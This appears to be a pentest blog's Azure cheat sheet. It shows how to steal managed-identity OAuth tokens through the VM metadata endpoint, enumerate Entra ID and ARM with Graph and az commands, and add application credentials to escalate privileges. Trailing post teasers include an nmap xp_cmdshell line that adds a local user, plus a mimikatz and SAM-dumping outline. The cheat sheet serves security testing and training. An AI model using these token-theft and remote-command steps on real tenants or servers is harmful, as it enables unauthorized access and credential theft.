Skip to main content

Cloud Pentest Cheatsheet - Azure

By
Azure Cloud offers a comprehensive ecosystem of tools and services. Among its core components are:
  • Azure Active Directory (AAD)
  • Azure Resource Manager (ARM)
  • Office 365 (O365)

Initial Access

Try to get a user credential via OSINT/Social engineering or try to comprise a web application hosted on Azure VM. Enumerate the roles attached to the VM and try to escalate your privileges. 

Entra ID Directory Role

Entra ID directory roles are predefined roles that grant permissions to perform specific tasks within an Azure AD tenant. These roles are essential for managing administrative tasks in Entra ID.

Types of Roles:

  1. Built-in Directory Roles
    • Global Administrator
    • Application Administrator
    • User Administrator
  2. Custom Directory Roles

Accessing APIs in Azure

Entra ID - Access via Microsoft Graph API Endpoint

{HTTP method} https://graph.microsoft.com/{version}/{resource}?{query-parameters}

Azure Resource Manager API Endpoint (ARM-specific)

{HTTP method} https://management.azure.com/{version}/{resource}?{query-parameters}

Microsoft Graph API

{HTTP method} https://graph.microsoft.com/{version}/{resource}?{query-parameters}

O365 API (Management, Outlook, and Other Applications)

{HTTP method} https://*.office.com/{version}/{resource}?{query-parameters}

Fetching OAuth Tokens from Azure
Resource for ARM is https://management.azure.com/ 
Resource for Microsoft Graph API is https://graph.microsoft.com/

Get OAuth Token for Azure (ARM):

curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"

Get OAuth Token for Microsoft Graph API:

curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com/"

Enterprise Applications Included in Office 365

Office 365 encompasses a variety of enterprise applications, including:

Office 365 Management Access

Web Portals:

Simple Enumeration Steps 

#login using compromised account
az login
az account list

#Get the user ID of a given user
Get-MgUser -Filter "startswith(displayName,'UserNameHere')"

#Get a list of group, specified member part of
Get-MgUserMemberOf -UserId [UserID]

#List all objects owned by the user
Get-MgUserOwnedObject -UserId [UserID] | ConvertTo-Json

#Get an application object id & app id :
Get-MgApplication -Filter "startswith(displayName,'prod-app')"

#Get a list of all application in Entra ID Tenant :
Get-MgApplicationOwner -ApplicationId "AppObjectID" | ConvertTo-Json

#As an app owner, create an application credential.
Add-MgApplicationPassword -ApplicationId "AppObjectID" | ConvertTo-Json

#Check the directory role assigned to prod application.
Get-MgDirectoryRolememberasServicePrincipal -DirectoryRoleId 664f8b57-19df-4893-91f2-6657c3d27b5c | ConvertTo-json

#Get all the role assignment “dev1” user have on azure subscription
az role assignment list --assignee 'dev1@domain.com' --all

#Enumerate VM Instance and it’s public ip address:
az vm list
az vm list-ip-addresses --name prod-vm --resource-group PROD-RG

#Exploit public facing application and retrieve access token of managed
curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version =2018-02-01&resource=https://management.azure.com/"

#Configure access token in az powershell cli :
$token = “AccessToken” 
Connect-AzAccount -AccessToken $token -AccountId [Subscription ID]

#Now Check Again, role assignment of managed identity attached to vm :
Get-AzRoleAssignment -ObjectId [PrincipalID-ManagedIdentity]


#Enumerate the MS Graph API Permission of given Application ID 
$app= Get-MgApplication -ApplicationId [APP_ID_Here]
$app.requiredResourceAccess | ConvertTo-Json
$res=Get-MgServicePrincipal -Filter "DisplayName eq 'Microsoft Graph'"
$res.AppRoles | Where-Object {$_.ID -eq '[RoleID]’} | ConvertTo-Json


Using AZ Powershell Module
powershell.exe -executionpolicy unrestricted
Install-Module -Name Az -Repository PSGallery -Force

Import-Module Az.Accounts
$token = 'JWT Token'
Connect-AzAccount -AccessToken $token -AccountId [Subscription/Tenant ID]

Microsoft Graph CLI  - Powershell
#Installation
Install-Module Microsoft.Graph -Scope CurrentUser -Repository PSGallery -Force

#Validate the Installation 
Get-InstalledModule Microsoft.Graph

# Auth via browser 
Connect-MgGraph -Scopes "Directory.Read.All"

# Import Module 
powershell.exe -executionpolicy unrestricted
Import-Module Microsoft.Graph.Authentication

# Get OAuth token for Graph API 
curl -H "Metadata:true" "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com/"

#Logging in with a token 
$token = 'eyJ0'
$secureToken = ConvertTo-SecureString $token -AsPlainText -Force
Connect-MgGraph -AccessToken $secureToken

# Get currently logged-in session information or login via Browser
Get-MgContext 

#Generate an AccessToken with creds
az account get-access-token --resource https://graph.microsoft.com
Connect-MgGraph -AccessToken [TOKEN]

#Get a List of all directory roles
Get-MgDirectoryRole | ConvertTo-Json

#Get a list of members of a directory roles
Get-MgDirectoryRoleMember -DirectoryRoleId [Directory RoleID] -All | ConvertTo-Json

#Get a lists of users in Entra ID
Get-MgUser

#Get a list of group, specified member part of
Get-MgUserMemberOf -UserId [UserID]

#Get the user ID of a given user
Get-MgUser -Filter "startswith(displayName,'UserNameHere')"

#List all objects owned by the user
Get-MgUserOwnedObject -UserId [UserID] | ConvertTo-Json

#Get a lists of all groups in Entra ID
Get-MgGroup

#Get a List of members of a group
Get-MgGroupMember -GroupId [GroupID] | ConvertTo-Json
Entra ID Application / Service Principal
#Get the list of all applications.
Get-MgApplication

#Get the details about a specific applications.
Get-MgApplication -ApplicationId [ApplicationObjectID] | ConvertTo-Json

#Get the detail about owner of the specified applications.
Get-MgApplicationOwner -ApplicationId [ApplicationObjectID] | ConvertTo-Json

#Get the details about application permission for an application.
$app= Get-MgApplication -ApplicationId [ApplicationObjectID]
$app.RequiredResourceAccess

#Get the details of App Role for Microsoft Graph API.
$res=Get-MgServicePrincipal -Filter "DisplayName eq 'Microsoft Graph'"
$res.AppRoles | Where-Object {$_.ID -eq 'AppRoleID'} | ConvertTo-Json

#Get the details about delegation permission for an application.
$app= Get-MgApplication -ApplicationId [ApplicationObjectID]
$app.Oauth2RequirePostResponse | ConvertTo-Json


Enumeration : Azure Resource Manager - AZ CLI 
# Auth via Browser
az login 

# Auth via Service Principal ( App ID + Password )
az login --service-principal -u ApplicationID_Here -p PasswordHere --tenant TenantID_Here

#Get details about currently logged in session
az account show

#Get the list of all available subscriptions
az account list --all

#Get the details of a subscription
az account show -s Subscription-ID/Name


Resource Group :
#Get the list of available resource group in current subscription
az group list -s Subscription-ID/Name

#Get the list of available resource group in a specified subscription
az group list -s Subscription-ID/Name


Azure Resources :
#Get the list of available resources in a current subscription
az resource list

#Get the list of available resources in a specified resource group
az resource list --resource-group ResourceGroupName



Role Assignment :
#Lists of roles assigned in specified subscription.
az role assignment list --subscription Subscription-ID/Name

#Lists of roles assigned in current subscription and inherited
az role assignment list -all

#List of all roles assigned to an identity [user, service principal, identity]
az role assignment list --assignee ObjectID/Sign-InEmail/ServicePrincipal --all


Role Definition :
#Lists of roles with assigned permission [Role Definition - For Inbuilt and Custom Role]
az role definition list

#Get the full information about a specified role
az role definition list -n RoleName

#Lists of custom role with assigned permissions
az role definition list --custom-role-only



Labels:

Comments

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

By
1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds...
Post a Comment
Read more

Windows Priv Escallation

By
1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD En...
Post a Comment
Read more

Forensics & Crypto

By
Online Decoder --> https://2cyr.com/decode/ Encoding errors -->  https://ftfy.now.sh/ File Signatures List -->  Click here PCAP Analysis: -->  https://www.packettotal.com/ Online Cipher Decryptors: CyberChef  - Cipher Decoder   Crack Station-Hash Cracke r Decrypt Any Kind of Hash 1)  Cipher Statistics 2)  Index of Coincidence Calculator - Online IC Cryptanalysis Tool 3)  Tools List (Awesome and Fantastic Tools) Available on dCode 4)  Solve an Aristocrat or Patristocrat 5)  RSA attack tool (mainly for ctf) - retreive private key from weak public key and/or uncipher data 5-1)  RSA - Find PQ using N 6)  BertNase's Own Hide content in a Image made of blocks - npiet fun! 7)  Vigenere Solver - www.guballa.de 8)  Fernet (Decode) 9)  Unicode Text Steganography Encoders/Decoders 10)  All in ONE encoders and Decoders Tool 11) Cryptii - Decoder Image Forensics: 1)  Forensical...
Post a Comment
Read more